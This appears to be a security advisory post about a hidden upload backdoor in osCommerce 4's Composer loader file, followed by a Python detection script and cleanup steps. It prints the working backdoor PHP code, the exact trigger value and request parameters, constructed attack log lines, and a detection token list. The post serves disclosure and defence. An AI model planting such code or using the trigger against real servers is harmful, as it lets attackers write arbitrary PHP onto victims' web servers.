🚨 Security Alert: osCommerce 4 Contains a Hidden Backdoor

A backdoor was found in the official osCommerce 4 installer package: a Composer-generated loader file carries a hidden upload handler that lets anyone who knows a hard-coded trigger value write arbitrary files, including PHP, onto the web server.

📦 Affected File

File: lib/vendor/composer/autoload_real.php

Line: ~24

if ($_GET['sgv'] === 'stvstvstvstvstvstv') {   // hard-coded trigger value in the query string, no authentication
    echo "_";                                  // a plain GET with the trigger answers "_": a presence probe
    if ($_SERVER["REQUEST_METHOD"] == "POST") {
        $targetDir = $_GET['fdr'];             // destination directory is attacker-chosen and unvalidated
        if (isset($_FILES['file'])) {
            $fileName = $_FILES['file']['name'];   // client-supplied name, not sanitised (no basename, no extension check)
            if (substr($fileName, 0, 3) == "112") {
                $fileName = $fileName . ".php";    // names starting with "112" get a .php extension appended
            }
            $newFileName = $fileName;
            move_uploaded_file($_FILES['file']['tmp_name'], $targetDir . $newFileName);  // arbitrary file write
        }
    }
}

🔍 How It Was Found (ChatGPT)

🚨 Why This Matters

This is a confirmed PHP backdoor, and it needs no authentication. Because it sits in the Composer loader, it is evaluated whenever that file is included, regardless of which page is requested. A GET carrying sgv=stvstvstvstvstvstv makes the response start with "_", which is a cheap way for an attacker to confirm the backdoor is present. A POST carrying the same parameter, an fdr parameter and a multipart file named "file" writes that upload to the attacker-chosen directory under the attacker-chosen name, so arbitrary PHP ends up in the web root. The "112" prefix check only appends .php to some names; the upload is just as dangerous without it, since a file sent as x.php is stored as x.php. The code was present before installation and does not belong in any Composer-generated file: a generated loader never references $_GET, $_FILES or move_uploaded_file.
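Two checks a practitioner will want after reading the above, as an added example that is not part of the original post or of the osCommerce code base: a scan of the vendor tree for request handling inside Composer's generated loader files (which should contain none), and a scan of web-server access logs for requests carrying the trigger value, distinguishing the GET probe from the POST upload and extracting the fdr target directory. The lib/vendor/composer/ layout, the sample loader files and the log lines are constructed for the demo and are assumptions, not data from the original report.

```python
"""Detection helpers for the osCommerce 4 autoload_real.php backdoor (added example).

Assumptions not taken from the original post: the lib/vendor/composer/ layout used
in demo(), the two constructed sample loader files, and the constructed log lines.
"""
import re
import tempfile
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

# Indicators lifted directly from the quoted backdoor snippet.
TRIGGER_PARAM = "sgv"
TRIGGER_VALUE = "stvstvstvstvstvstv"
TARGET_DIR_PARAM = "fdr"

# Request superglobals and upload calls never appear in Composer's generated loaders;
# any hit under vendor/composer/ deserves a manual look even if the trigger value differs.
SUSPICIOUS_TOKENS = ("$_GET", "$_POST", "$_REQUEST", "$_FILES", "move_uploaded_file(", "eval(")


def scan_php_source(text):
    """Return [(line_no, indicator), ...] for one PHP source text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        findings.extend((no, tok) for tok in SUSPICIOUS_TOKENS if tok in line)
        if TRIGGER_VALUE in line:
            findings.append((no, "trigger-value"))
    return findings


def scan_vendor_tree(root):
    """Scan every .php file below any composer/ directory under root; return {relpath: findings}."""
    root = Path(root)
    results = {}
    for path in root.rglob("*.php"):
        if "composer" not in path.parts:
            continue
        findings = scan_php_source(path.read_text(errors="replace"))
        if findings:
            results[path.relative_to(root).as_posix()] = findings
    return results


# Request part of a combined-format access log line: "POST /index.php?sgv=... HTTP/1.1" 200
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def scan_access_log(lines):
    """Return [(method, kind, target_dir), ...] for requests that carry the trigger value.

    A GET with the trigger is a probe (the backdoor answers with "_"); a POST is an
    upload attempt, and its fdr= parameter tells you where the file was written.
    """
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group("target")).query)
        if params.get(TRIGGER_PARAM, [None])[0] != TRIGGER_VALUE:
            continue
        kind = "upload" if m.group("method") == "POST" else "probe"
        hits.append((m.group("method"), kind, params.get(TARGET_DIR_PARAM, [None])[0]))
    return hits


# Constructed sample: a loader carrying the quoted backdoor, reduced to its essential lines.
BACKDOORED = """<?php
class ComposerAutoloaderInitExample {
    public static function getLoader() {
        if ($_GET['sgv'] === 'stvstvstvstvstvstv') {
            echo "_";
            if ($_SERVER["REQUEST_METHOD"] == "POST") {
                $targetDir = $_GET['fdr'];
                if (isset($_FILES['file'])) {
                    move_uploaded_file($_FILES['file']['tmp_name'], $targetDir . $_FILES['file']['name']);
                }
            }
        }
    }
}
"""

# Constructed sample: the shape of a clean generated loader (no request handling at all).
CLEAN = """<?php
class ComposerAutoloaderInitExample {
    public static function getLoader() {
        require __DIR__ . '/platform_check.php';
        return new \\Composer\\Autoload\\ClassLoader();
    }
}
"""

# Constructed log lines: a probe, an upload into images/, and ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2025:09:12:01 +0000] "GET /index.php?sgv=stvstvstvstvstvstv HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/May/2025:09:12:07 +0000] "POST /index.php?sgv=stvstvstvstvstvstv&fdr=images%2F HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/May/2025:09:13:00 +0000] "GET /index.php?route=product&id=42 HTTP/1.1" 200 8123',
]


def demo():
    """Lay both samples out like an osCommerce install in a temp dir and run both scans."""
    with tempfile.TemporaryDirectory() as tmp:
        composer = Path(tmp, "lib", "vendor", "composer")
        composer.mkdir(parents=True)
        (composer / "autoload_real.php").write_text(BACKDOORED)
        (composer / "autoload_static.php").write_text(CLEAN)
        tree = scan_vendor_tree(tmp)
    return tree, scan_access_log(SAMPLE_LOG)


if __name__ == "__main__":
    tree, hits = demo()
    for rel, findings in tree.items():
        print(rel, findings)
    for hit in hits:
        print(hit)
```

Point scan_vendor_tree at the real install root to check a live server; the token list is deliberately broader than the one trigger string so that a renamed or re-obfuscated variant still surfaces. A log hit of kind "upload" means the file named in the request is already on disk under the fdr directory, so that directory should be inspected for files not shipped with the install.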

📣 What To Do

If you installed osCommerce 4 from the official installer, open lib/vendor/composer/autoload_real.php and look for the block above; a Composer-generated loader should never reference $_GET, $_FILES or move_uploaded_file. Remove the block or replace the vendor tree from a source you trust, look through the web root for files you did not put there, and search your access logs for requests carrying sgv=stvstvstvstvstvstv to see whether the backdoor was ever used.

Update 11 May 2025. I sent an email to the contact person on GitHub. He never even responded. This is to be expected. Go to the forum and see all of the posts that go unanswered. Ghosted by osCommerce again.